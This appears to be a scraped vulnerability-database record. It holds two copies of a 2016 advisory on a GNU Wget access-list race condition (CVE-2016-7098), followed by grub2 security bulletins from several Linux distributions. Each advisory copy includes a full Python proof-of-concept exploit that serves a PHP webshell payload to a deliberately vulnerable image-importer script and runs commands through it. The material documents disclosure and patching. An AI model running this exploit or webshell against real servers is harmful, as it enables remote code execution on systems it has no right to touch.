/_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \n \n============================================= \n- Discovered by: Dawid Golunski \n- dawid[at]legalhackers.com \n- https://legalhackers.com \n \n- CVE-2016-7098 \n- Release date: 24.11.2016 \n- Revision 1.0 \n- Severity: Medium \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nGNU Wget < 1.18 Access List Bypass / Race Condition \n \n \nII. BACKGROUND \n------------------------- \n \n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc. \n \nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy \n\" \n \nhttps://www.gnu.org/software/wget/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nGNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, \nis affected by a Race Condition vulnerability that might allow remote attackers \nto bypass intended wget access list restrictions specified with -A parameter. \nThis might allow attackers to place malicious/restricted files onto the system. \nDepending on the application / download directory, this could potentially lead \nto other vulnerabilities such as code execution etc. \n \n \nIV. DESCRIPTION \n------------------------- \n \nWhen wget is used in recursive/mirroring mode, according to the manual it can \ntake the following access list options: \n \n\"Recursive Accept/Reject Options: \n-A acclist --accept acclist \n-R rejlist --reject rejlist \n \nSpecify comma-separated lists of file name suffixes or patterns to accept or \nreject. Note that if any of the wildcard characters, *, ?, [ or ], appear in \nan element of acclist or rejlist, it will be treated as a pattern, rather \nthan a suffix.\" \n \n \nThese can for example be used to only download JPG images. \n \nIt was however discovered that when a single file is requested with recursive \noption (-r / -m) and an access list ( -A ), wget only applies the checks at the \nend of the download process. \n \nThis can be observed in the output below: \n \n# wget -r -nH -A '*.jpg' http://attackersvr/test.php \nResolving attackersvr... 192.168.57.1 \nConnecting to attackersvr|192.168.57.1|:80... connected. \nHTTP request sent, awaiting response... 200 OK \nLength: unspecified [text/plain] \nSaving to: AC/a!Etest.phpAC/a!aC/ \n \n15:05:46 (27.3 B/s) - AC/a!Etest.phpAC/a!aC/ saved [52] \n \nRemoving test.php since it should be rejected. \n \nFINISHED \n \n \nAlthough wget deletes the file at the end of the download process, this creates \na race condition as an attacker with control over the URL/remote server could \nintentionally slow down the download process so that they had a chance to make \nuse of the malicious file before it gets deleted. \n \nIt is very easy to win the race as the file only gets deleted after the HTTP \nconnection is terminated. The attacker could therefore keep the connection open \nas long as it was necessary to make use of the uploaded file as demonstrated \nin the proof of concept below. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------------ \n \n \nHere is a simple vulnerable PHP web application that uses wget to download \nimages from a user-provided server/URL: \n \n \n---[ image_importer.php ]--- \n \n<?php \n// Vulnerable webapp [image_importer.php] \n// Uses wget to import user images from provided site URL \n// It only accepts JPG files (-A wget option). \n \nif ( isset($_GET['imgurl']) ) { \n$URL = escapeshellarg($_GET['imgurl']); \n} else { \ndie(\"imgurl parameter missing\"); \n} \n \nif ( !file_exists(\"image_uploads\") ) { \nmkdir(\"image_uploads\"); \n} \n \n// Download user JPG images into /image_uploads directory \nsystem(\"wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1\"); \n?> \n \n \n---------------------------- \n \n \nFor example: \nhttps://victimsvr/image_importer.php?imgurl= href=\"http://images/logo.jpg\">http://images/logo.jpg \n \nwill cause wget to upload logo.jpg file into: \nhttps://victimsvr/images_uploads/logo.jpg \n \nThe wget access list (-A) is to ensure that only .jpg files get uploaded. \n \nHowever due to the wget race condition vulnerability an attacker could use \nthe exploit below to upload an arbitrary PHP script to /image_uploads directory \nand achieve code execution. \n \n \n---[ wget-race-exploit.py ]--- \n \n#!/usr/bin/env python \n \n# \n# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit \n# CVE-2016-7098 \n# \n# Dawid Golunski \n# https://legalhackers.com \n# \n# \n# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious \n# file for long enough to take advantage of it. \n# The exploit sets up a web server on port 80 and waits for a download request from wget. \n# It then supplies a PHP webshell payload and requests the uploaded file before it gets \n# removed by wget. \n# \n# Adjust target URL (WEBSHELL_URL) before executing. \n# \n# Full advisory at: \n# \n# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html \n# \n# Disclaimer: \n# \n# For testing purposes only. Do no harm. \n# \n# \n \nimport SimpleHTTPServer \nimport time \nimport SocketServer \nimport urllib2 \nimport sys \n \nHTTP_LISTEN_IP = '0.0.0.0' \nHTTP_LISTEN_PORT = 80 \n \nPAYLOAD=''' \n<?php \n//our webshell \nsystem($_GET[\"cmd\"]); \nsystem(\"touch /tmp/wgethack\"); \n?> \n''' \n \n# Webshell URL to be requested before the connection is closed \n# i.e before the uploaded \"temporary\" file gets removed. \nWEBSHELL_URL=\"http://victimsvr/image_uploads/webshell.php\" \n \n# Command to be executed through 'cmd' GET paramter of the webshell \nCMD=\"/usr/bin/id\" \n \n \nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): \ndef do_GET(self): \n# Send the payload on GET request \nprint \"[+] Got connection from wget requesting \" + self.path + \" via GET :)\\n\" \nself.send_response(200) \nself.send_header('Content-type', 'text/plain') \nself.end_headers() \nself.wfile.write(PAYLOAD) \nprint \"\\n[+] PHP webshell payload was sent.\\n\" \n \n# Wait for the file to be flushed to disk on remote host etc. \nprint \"[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\\n\" \ntime.sleep(2) \n \n# Request uploaded webshell \nprint \"[+} File '\" + self.path + \"' should be saved by now :)\\n\" \nprint \"[+} Executing \" + CMD + \" via webshell URL: \" + WEBSHELL_URL + \"?cmd=\" + CMD + \"\\n\" \nprint \"[+} Command result: \" \nprint urllib2.urlopen(WEBSHELL_URL+\"?cmd=\"+CMD).read() \n \nprint \"[+} All done. Closing HTTP connection...\\n\" \n# Connection will be closed on request handler return \nreturn \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"\\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \\nCVE-2016-7098\\n\\nDawid Golunski \\nhttps://legalhackers.com \\n\" \nprint \"[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n------------------------------ \n \n \n \nIf the attacker run this exploit on their server ('attackersver') and pointed \nthe vulnerable script image_importer.php at it via URL: \n \nhttps://victimsvr/image_importer.php?imgurl= href=\"http://attackersvr/webshell.php\">http://attackersvr/webshell.php \n \nThe attacker will see output similar to: \n \n \n \nroot@attackersvr:~# ./wget-race-exploit.py \n \nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098 \n \nDawid Golunski \nhttps://legalhackers.com \n \n[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect... \n \n[+] Got connection from wget requesting /webshell.php via GET :) \n \nvictimsvr - - [24/Nov/2016 00:46:18] \"GET /webshell.php HTTP/1.1\" 200 - \n \n[+] PHP webshell payload was sent. \n \n[+} Sleep for 2s to make sure the file has been flushed to the disk on the target... \n \n[+} File '/webshell.php' should be saved by now :) \n \n[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id \n \n[+} Command result: \n \nuid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd) \n \n[+} All done. Closing HTTP connection... \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nThe vulnerability might allow remote servers to bypass intended wget access list \nrestrictions to temporarily store a malicious file on the server. \nIn certain cases, depending on the context wget command was used in and download \npath, this issue could potentially lead to other vulnerabilities such as \nscript execution as shown in the PoC section. \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nWget < 1.18 \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to latest version of wget 1.18 or apply patches provided by the vendor. \n \nIX. REFERENCES \n------------------------- \n \nhttps://legalhackers.com \n \nhttps://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html \n \nhttps://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py \n \nhttps://www.gnu.org/software/wget/ \n \nhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098 \n \nhttps://security-tracker.debian.org/tracker/CVE-2016-7098 \n \nhttp://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html \n \nhttp://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098 \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \n \nhttps://legalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n24.11.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139895/wget-bypassracecondition.txt"}], "centos": [{"lastseen": "2020-02-04T12:34:09", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:2653\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-December/033583.html\n\n**Affected packages:**\ngrub2\ngrub2-efi\ngrub2-efi-modules\ngrub2-tools\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-2623.html", "modified": "2015-12-16T02:26:44", "published": "2015-12-16T02:26:44", "id": "CESA-2015:2653", "href": "http://lists.centos.org/pipermail/centos-announce/2015-December/033583.html", "title": "grub2 security update", "type": "centos", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "bulletinFamily": "exploit", "description": "\nGNU Wget 1.18 - Access List Bypass Race Condition", "modified": "2016-11-24T00:00:00", "published": "2016-11-24T00:00:00", "id": "EXPLOITPACK:685736E4C755F22A0B6BB2CF8E57DD6D", "href": "", "title": "GNU Wget 1.18 - Access List Bypass Race Condition", "type": "exploitpack", "sourceData": "'''\n=============================================\n- Discovered by: Dawid Golunski\n- dawid[at]legalhackers.com\n- https://legalhackers.com\n- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\n\n- CVE-2016-7098\n- Release date: 24.11.2016\n- Revision 1.0\n- Severity: Medium\n=============================================\n\n\nI. VULNERABILITY\n-------------------------\n\nGNU Wget < 1.18 Access List Bypass / Race Condition\n\n\nII. BACKGROUND\n-------------------------\n\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \nFTP, the most widely-used Internet protocols. \nIt is a non-interactive commandline tool, so it may easily be called from \nscripts, cron jobs, terminals without X-Windows support, etc.\n\nGNU Wget has many features to make retrieving large files or mirroring entire \nweb or FTP sites easy\n\"\n\nhttps://www.gnu.org/software/wget/\n\n\nIII. INTRODUCTION\n-------------------------\n\nGNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, \nis affected by a Race Condition vulnerability that might allow remote attackers \nto bypass intended wget access list restrictions specified with -A parameter.\nThis might allow attackers to place malicious/restricted files onto the system. \nDepending on the application / download directory, this could potentially lead \nto other vulnerabilities such as code execution etc.\n\n\nIV. DESCRIPTION\n-------------------------\n\nWhen wget is used in recursive/mirroring mode, according to the manual it can \ntake the following access list options:\n\n\"Recursive Accept/Reject Options:\n -A acclist --accept acclist\n -R rejlist --reject rejlist\n\nSpecify comma-separated lists of file name suffixes or patterns to accept or \nreject. Note that if any of the wildcard characters, *, ?, [ or ], appear in \nan element of acclist or rejlist, it will be treated as a pattern, rather \nthan a suffix.\"\n\n\nThese can for example be used to only download JPG images. \n\nIt was however discovered that when a single file is requested with recursive \noption (-r / -m) and an access list ( -A ), wget only applies the checks at the\nend of the download process. \n\nThis can be observed in the output below:\n\n# wget -r -nH -A '*.jpg' http://attackersvr/test.php\nResolving attackersvr... 192.168.57.1\nConnecting to attackersvr|192.168.57.1|:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [text/plain]\nSaving to: \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122\n\n15:05:46 (27.3 B/s) - \u00e2\u20ac\u02dctest.php\u00e2\u20ac\u2122 saved [52]\n\nRemoving test.php since it should be rejected.\n\nFINISHED\n\n\nAlthough wget deletes the file at the end of the download process, this creates \na race condition as an attacker with control over the URL/remote server could \nintentionally slow down the download process so that they had a chance to make \nuse of the malicious file before it gets deleted.\n\nIt is very easy to win the race as the file only gets deleted after the HTTP \nconnection is terminated. The attacker could therefore keep the connection open \nas long as it was necessary to make use of the uploaded file as demonstrated\nin the proof of concept below.\n\n\nV. PROOF OF CONCEPT EXPLOIT\n------------------------------\n\n\nHere is a simple vulnerable PHP web application that uses wget to download \nimages from a user-provided server/URL:\n\n\n---[ image_importer.php ]---\n\n<?php\n // Vulnerable webapp [image_importer.php]\n // Uses wget to import user images from provided site URL \n // It only accepts JPG files (-A wget option).\n\n if ( isset($_GET['imgurl']) ) {\n $URL = escapeshellarg($_GET['imgurl']);\n } else {\n die(\"imgurl parameter missing\");\n }\n\n if ( !file_exists(\"image_uploads\") ) {\n mkdir(\"image_uploads\");\n }\n\n // Download user JPG images into /image_uploads directory\n system(\"wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1\");\n?>\n\n\n----------------------------\n\n\nFor example:\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://images/logo.jpg\">http://images/logo.jpg\n\nwill cause wget to upload logo.jpg file into:\nhttps://victimsvr/images_uploads/logo.jpg\n\nThe wget access list (-A) is to ensure that only .jpg files get uploaded.\n\nHowever due to the wget race condition vulnerability an attacker could use \nthe exploit below to upload an arbitrary PHP script to /image_uploads directory\nand achieve code execution.\n\n\n---[ wget-race-exploit.py ]---\n'''\n\n#!/usr/bin/env python\n\n#\n# Wget < 1.18 Access List Bypass / Race Condition PoC Exploit\n# CVE-2016-7098\n#\n# Dawid Golunski\n# https://legalhackers.com\n#\n#\n# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious\n# file for long enough to take advantage of it.\n# The exploit sets up a web server on port 80 and waits for a download request from wget.\n# It then supplies a PHP webshell payload and requests the uploaded file before it gets\n# removed by wget. \n#\n# Adjust target URL (WEBSHELL_URL) before executing.\n# \n# Full advisory at:\n#\n# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\n#\n# Disclaimer:\n#\n# For testing purposes only. Do no harm.\n#\n# \n\nimport SimpleHTTPServer\nimport time\nimport SocketServer\nimport urllib2\nimport sys\n\nHTTP_LISTEN_IP = '0.0.0.0'\nHTTP_LISTEN_PORT = 80\n\nPAYLOAD='''\n<?php\n\t//our webshell\n\tsystem($_GET[\"cmd\"]);\n\tsystem(\"touch /tmp/wgethack\");\n?>\n'''\n\n# Webshell URL to be requested before the connection is closed \n# i.e before the uploaded \"temporary\" file gets removed.\nWEBSHELL_URL=\"http://victimsvr/image_uploads/webshell.php\"\n\n# Command to be executed through 'cmd' GET paramter of the webshell\nCMD=\"/usr/bin/id\"\n\n\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\n def do_GET(self):\n # Send the payload on GET request\n print \"[+] Got connection from wget requesting \" + self.path + \" via GET :)\\n\"\n self.send_response(200)\n self.send_header('Content-type', 'text/plain')\n self.end_headers()\n self.wfile.write(PAYLOAD)\n print \"\\n[+] PHP webshell payload was sent.\\n\"\n\n # Wait for the file to be flushed to disk on remote host etc.\n print \"[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\\n\"\n time.sleep(2)\n\n # Request uploaded webshell\n print \"[+} File '\" + self.path + \"' should be saved by now :)\\n\"\n print \"[+} Executing \" + CMD + \" via webshell URL: \" + WEBSHELL_URL + \"?cmd=\" + CMD + \"\\n\"\n print \"[+} Command result: \"\n print urllib2.urlopen(WEBSHELL_URL+\"?cmd=\"+CMD).read()\n\n print \"[+} All done. Closing HTTP connection...\\n\"\n # Connection will be closed on request handler return\n return\n\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\n\nprint \"\\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \\nCVE-2016-7098\\n\\nDawid Golunski \\nhttps://legalhackers.com \\n\"\nprint \"[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\\n\" % HTTP_LISTEN_PORT\n\nhandler.serve_forever()\n\n'''\n------------------------------\n\nIf the attacker run this exploit on their server ('attackersver') and pointed \nthe vulnerable script image_importer.php at it via URL:\n\nhttps://victimsvr/image_importer.php?imgurl= href=\"http://attackersvr/webshell.php\">http://attackersvr/webshell.php\n\nThe attacker will see output similar to:\n\n\n\nroot@attackersvr:~# ./wget-race-exploit.py \n\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n\n[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...\n\n[+] Got connection from wget requesting /webshell.php via GET :)\n\nvictimsvr - - [24/Nov/2016 00:46:18] \"GET /webshell.php HTTP/1.1\" 200 -\n\n[+] PHP webshell payload was sent.\n\n[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n\n[+} File '/webshell.php' should be saved by now :)\n\n[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id\n\n[+} Command result: \n\nuid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)\n\n[+} All done. Closing HTTP connection...\n\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nThe vulnerability might allow remote servers to bypass intended wget access list \nrestrictions to temporarily store a malicious file on the server. \nIn certain cases, depending on the context wget command was used in and download\npath, this issue could potentially lead to other vulnerabilities such as\nscript execution as shown in the PoC section.\n \nVII. SYSTEMS AFFECTED\n-------------------------\n\nWget < 1.18\n \nVIII. SOLUTION\n-------------------------\n\nUpdate to latest version of wget 1.18 or apply patches provided by the vendor.\n \nIX. REFERENCES\n-------------------------\n\nhttps://legalhackers.com\n\nhttps://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html\n\nhttps://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py\n\nhttps://www.gnu.org/software/wget/\n\nhttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098\n\nhttps://security-tracker.debian.org/tracker/CVE-2016-7098\n\nhttp://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html\n\nhttp://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098\n\n\nX. CREDITS\n-------------------------\n\nThe vulnerability has been discovered by Dawid Golunski\ndawid (at) legalhackers (dot) com\n\nhttps://legalhackers.com\n \nXI. REVISION HISTORY\n-------------------------\n\n24.11.2016 - Advisory released\n \nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this information.\n'''", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:36:56", "bulletinFamily": "unix", "description": "New grub packages are available for Slackware 14.1 and -current to\nfix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/grub-2.00-i486-3_slack14.1.txz: Rebuilt.\n Patched bug where password protection during system startup may be\n bypassed by hitting the backspace key 28 times giving a rescue shell.\n Thanks to Hector Marco and Ismael Ripoll.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8370\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/grub-2.00-i486-3_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/grub-2.00-x86_64-3_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/grub-2.00-i586-3.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/grub-2.00-x86_64-3.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 package:\n5de408a0c4faa8c4cb7fbf926d983b17 grub-2.00-i486-3_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8c7c4da23a03536fc5306fce459d0695 grub-2.00-x86_64-3_slack14.1.txz\n\nSlackware -current package:\n5a416c513f561c91bb8fc1387f6622d3 a/grub-2.00-i586-3.txz\n\nSlackware x86_64 -current package:\n37119f35ad70e576303636cd3e9b4f0e a/grub-2.00-x86_64-3.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg grub-2.00-i486-3_slack14.1.txz", "modified": "2015-12-17T22:17:13", "published": "2015-12-17T22:17:13", "id": "SSA-2015-351-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.346050", "title": "grub", "type": "slackware", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "unix", "description": "[2.02-0.33.0.1]\n- Fix comparison in patch for 18504756\n- Remove symlink to grub environment file during uninstall on EFI platforms\n [bug 19231481]\n- update Oracle Linux certificates (Alexey Petrenko)\n- Put 'with' in menuentry instead of 'using' [bug 18504756]\n- Use different titles for UEK and RHCK kernels [bug 18504756]\n[2.02-0.33]\n- Don't remove 01_users, it's the wrong thing to do.\n Related:rhbz1290089\n[2.02-0.32]\n- Rebuild for .z so the release number is different.\n Related: rhbz#1290089\n[2.02-0.31]\n- More work on handling of GRUB2_PASSWORD\n Resolves: rhbz#1290089\n[2.02-0.30]\n- Fix security issue when reading username and password\n Resolves: CVE-2015-8370\n- Do a better job of handling GRUB_PASSWORD\n Resolves: rhbz#1290089", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "ELSA-2015-2623", "href": "http://linux.oracle.com/errata/ELSA-2015-2623.html", "title": "grub2 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:35", "bulletinFamily": "unix", "description": "The grub2 packages provide version 2 of the Grand Unified Bootloader\n(GRUB), a highly configurable and customizable bootloader with modular\narchitecture. The packages support a variety of kernel formats, file\nsystems, computer architectures, and hardware devices.\n\nA flaw was found in the way the grub2 handled backspace characters entered\nin username and password prompts. An attacker with access to the system\nconsole could use this flaw to bypass grub2 password protection and gain\nadministrative access to the system. (CVE-2015-8370)\n\nThis update also fixes the following bug:\n\n* When upgrading from Red Hat Enterprise Linux 7.1 and earlier, a\nconfigured boot password was not correctly migrated to the newly introduced\nuser.cfg configuration files. This could possibly prevent system\nadministrators from changing grub2 configuration during system boot even if\nthey provided the correct password. This update corrects the password\nmigration script and the incorrectly generated user.cfg file. (BZ#1290089)\n\nAll grub2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For this update to take\neffect on BIOS-based machines, grub2 needs to be reinstalled as documented\nin the \"Reinstalling GRUB 2 on BIOS-Based Machines\" section of the Red Hat\nEnterprise Linux 7 System Administrator's Guide linked to in the References\nsection. No manual action is needed on UEFI-based machines.", "modified": "2018-04-12T03:33:03", "published": "2015-12-15T14:27:04", "id": "RHSA-2015:2623", "href": "https://access.redhat.com/errata/RHSA-2015:2623", "type": "redhat", "title": "(RHSA-2015:2623) Moderate: grub2 security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}]}
